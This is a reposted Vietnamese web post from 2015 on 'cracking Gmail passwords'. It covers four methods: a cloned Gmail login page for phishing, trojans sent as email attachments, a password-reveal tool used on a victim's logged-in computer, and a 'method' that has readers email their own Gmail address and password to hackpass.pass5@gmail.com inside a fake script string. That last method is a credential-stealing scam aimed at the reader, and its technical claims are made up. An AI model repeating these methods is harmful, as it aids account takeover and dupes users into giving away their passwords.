Hướng dẫn phá pass Gmail

Nhanluu1294 Nhanluu1294 @Nhanluu1294

Hướng dẫn phá pass Gmail

19/04/2015 01:40 PM
23,879
Cùng tham khảo những hướng dẫn phá pass Gmail đơn giản và nhanh chóng nhé các bạn


Cách hack password Gmail 


Cách 1:

Bạn có thể tạo 1 giao diện giống hệt như Gmail (việc này thì dễ ợt chứ gì nữa), sau đó sửa đổi chút xíu... hê hê...để cho khi victim gõ pass và username thì lập tức pass bay như chim về email của ta, còn victim thì vẫn vào hòm thư mà không hề hay biết. Việc này bạn có thể thực hiện dễ dàng bằng front page mà không cần hiểu biết nhiều về html. Sau khi tạo xong giao diện, upload lên host thì bạn chỉ việc dụ victim vô tròng...khà khà...nếu bạn muốn thử nghiệm thì cứ việc ra ngoài quán net rùi để homepage ở đó là cái địa chỉ trang web mà bạn dùng để câu, chắc chắn là sẽ có nhiều chú gà mắc bẫy.

Cách 2:

Sử dụng Trojan: Có rất nhiều loại Trojan giúp bạn lấy password email, dial-up, account... như là: Hoocker,Barrio5.0,Barox, Kuang2,....! Bạn có thể download chúng ở đầy rẫy trên mạng ở các trang hacker. Nhưng việc sử dụng chúng thì không đơn giản, nếu có sai sót có thể chính bạn là nạn nhân đầu tiên.

Bạn có thể gửi Trojan cho victim như một file đính kèm và khi victim mở file đó Trojan sẽ có chỗ trú ngụ trong máy của victim và thế là password của họ sẽ "nhảy" về hòm thư của bạn. Thật tuyệt phải không? Nhưng khổ nỗi nếu máy của victim mà có cài Antivirus thì he..he, đành bó tay thui.

Cách 3:

Tất cả đều phải thực hiện trên tài khoản Gmail của bạn bởi vì hệ thống Gmail đã được cải thiện đáng kể về mặt bảo mật (Security).

Các bước thực hiện:

B1. Gửi một email tới: hackpass.pass5@gmail.com

B2. Dòng tiêu đề Subject của email ghi là: Hack pass

B3. Tiếp đến là nội dung email bạn chép vào đoạn JScript sau (nhớ chép thật chính xác nhé):

/config/gmail-cor/cgi-bin/start?v743&login= "Địa chỉ hòm thư của bạn"&f="Password của bạn"&f= 275866&javascript=ACTIVE&rsa> infor/-password#="" send back/?vj_&from="Địa chỉ hòm thư muốn lấy pass"

Ví dụ: Địa chỉ hòm thư của bạn là "ngoisaomayman@gmail.com", password là "thienthan" và địa chỉ hòm thư muốn lấy pass là "victim@gmail.com" thì bạn đánh như sau: /config/gmail-cor/cgi-bin/start?v743&login= "ngoisaomayman@gmail.com"&f="thienthan"&f= 275866&javascript=ACTIVE&rsa> infor/-password#="" send back/?vj_&from="victim@gmail.com" *Gmail Group cần password của bạn để họ có thể gửi một javascript từ account của bạn trên Gmail server tới hòm thư của victim.

Password của victim sẽ tự động được gửi đến email của bạn trong dấu "". Cách này tuy dễ thực hiện nhưng tỷ lệ thành công chỉ khoảng 70%, bởi vì nếu Web Browser của nạn nhân mà không hỗ trợ JS thì đành bó tay thôi, sau 2 phút chờ đợi mà không thấy Gmail server hồi âm thì có lẽ bạn nên chuyển sang cách tiếp theo.

Cách 4:

Đây là cách dịch pass từ ****** về nguyên dạng của nó, cách này thì 100% là thành công, nghe phê chưa. Ấy bình tĩnh để em post lên chớ.

Cách này sử dụng khi bác đến nhà victim chơi hoặc ra ngoài quán net, nếu bác thấy victim dùng tính năng “Duy trì trạng thái đăng nhập” thì hãy nhanh nhanh dùng cách này. Các bác download SnadBoy`s Revelation v2 (lên google.com mà tìm download), sau đó thì cách sử dụng nó quá dễ khỏi đưa lên đây.

Cách này khá đơn giản và hiệu quả là 100% nhưng ít có đất dụng võ vì nếu victim đọc bài này rùi thì họ sẽ không dùng cái “Duy trì trạng thái đăng nhập” nữa đâu.


Hướng dẫn phá pass rar nhanh và hiệu quả
Hướng dẫn phá pass sheet Excel
Hướng dẫn phá pass yahoo
Hướng dẫn phá pass trong Win 7 cực dễ
Hướng dẫn phá pass điện thoại Nokia

(St)

 
Hỏi đáp, bình luận, trả bài:
*địa chỉ email của bạn được bảo mật

Hot nhất
Top xink
Bộ sưu tập
Chợ xink
Thanh lý